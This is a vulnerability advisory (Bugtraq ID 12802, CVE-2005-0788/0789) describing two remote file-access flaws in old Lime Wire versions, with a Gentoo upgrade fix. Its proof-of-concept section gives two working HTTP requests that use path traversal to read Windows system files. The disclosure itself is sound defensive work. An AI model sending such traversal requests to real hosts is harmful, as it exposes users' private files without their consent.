BID:12802

Lime Wire Multiple Remote Unauthorized Access Vulnerabilities

Info

Lime Wire Multiple Remote Unauthorized Access Vulnerabilities

Bugtraq ID:	12802
Class:	Access Validation Error
CVE:	CVE-2005-0789 CVE-2005-0788
Remote:	Yes
Local:	No
Published:	Mar 14 2005 12:00AM
Updated:	Jul 12 2009 10:56AM
Credit:	Kevin Walsh <[email protected]> is credited with the discovery of this issue.
Vulnerable:	Lime Wire LLC Lime Wire 4.6 + Gentoo Linux Lime Wire LLC Lime Wire 4.4.5 Lime Wire LLC Lime Wire 4.4.4 Lime Wire LLC Lime Wire 4.4.3 Lime Wire LLC Lime Wire 4.4.2 Lime Wire LLC Lime Wire 4.4.1 Lime Wire LLC Lime Wire 4.4 Lime Wire LLC Lime Wire 4.3.3 Lime Wire LLC Lime Wire 4.3.2 Lime Wire LLC Lime Wire 4.3.1 Lime Wire LLC Lime Wire 4.3 Lime Wire LLC Lime Wire 4.2.6 Lime Wire LLC Lime Wire 4.2.5 Lime Wire LLC Lime Wire 4.2.4 Lime Wire LLC Lime Wire 4.2.3 Lime Wire LLC Lime Wire 4.2.2 Lime Wire LLC Lime Wire 4.2.1 Lime Wire LLC Lime Wire 4.2 Lime Wire LLC Lime Wire 4.1.10 Lime Wire LLC Lime Wire 4.1.9 Lime Wire LLC Lime Wire 4.1.8 Lime Wire LLC Lime Wire 4.1.7 Lime Wire LLC Lime Wire 4.1.5 Lime Wire LLC Lime Wire 4.1.4 Lime Wire LLC Lime Wire 4.1.3 Lime Wire LLC Lime Wire 4.1.2 Lime Wire LLC Lime Wire 4.1.1 Lime Wire LLC Lime Wire 4.1 Lime Wire LLC Lime Wire 4.0 Lime Wire LLC Lime Wire 3.9.12 Lime Wire LLC Lime Wire 3.9.11 Lime Wire LLC Lime Wire 3.9.10 Lime Wire LLC Lime Wire 3.9.9 Lime Wire LLC Lime Wire 3.9.8 Lime Wire LLC Lime Wire 3.9.7 Lime Wire LLC Lime Wire 3.9.6

Not Vulnerable:	Lime Wire LLC Lime Wire 4.8.1 + Gentoo Linux Lime Wire LLC Lime Wire 4.8

Discussion

Lime Wire Multiple Remote Unauthorized Access Vulnerabilities

Multiple remote unauthorized access vulnerabilities affect Lime Wire. These issues are due to the application failing to securely service malicious requests.

Two issues have been reported; both issues are due to a failure of the application to ensure that file requests for files outside of the application's shared directory are denied.

An attacker may leverage these issues to gain access to potentially sensitive files with the permissions of the unsuspecting user that activated the affected application.

Exploit / POC

Lime Wire Multiple Remote Unauthorized Access Vulnerabilities

No exploit is required to leverage either of these issues. The following proof of concept requests have been provided:

To retrieve the file 'win.ini' by exploiting the first issue the attacker must connect to the affected application over the offending port and issue the following request:

GET /gnutella/res/C:\Windows\win.ini HTTP/1.1
User-Agent: I-AM-AN-ATTACKER/1.0
Host: 0.0.0.0:0
Accept: */*
Connection: Keep-Alive

To retrieve the same file with the second issue the attacker must connect to the affected application over the offending port and issue the following request:

GET /magnet10/../../../../../Windows/Win.ini?Simple-test?
User-Agent: I-AM-AN-ATTACKER/1.0
Host: 0.0.0.0:0
Accept: */*
Connection: Keep-Alive

The following proof of concept exploit has been released designed ot leverage the gnutella file access issue:

/data/vulnerabilities/exploits/limeHack.pl

Solution / Fix

Lime Wire Multiple Remote Unauthorized Access Vulnerabilities

Solution:
The vendor has released an update dealing with these issues.

Gentoo Linux has released advisory GLSA 200503-37 dealing with this issue. Gentoo advises that all users upgrade their packages by carrying out the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=net-p2p/limewire-4.8.1"

For more information, please see the referenced Gentoo Linux advisory.

Lime Wire LLC Lime Wire 3.9.10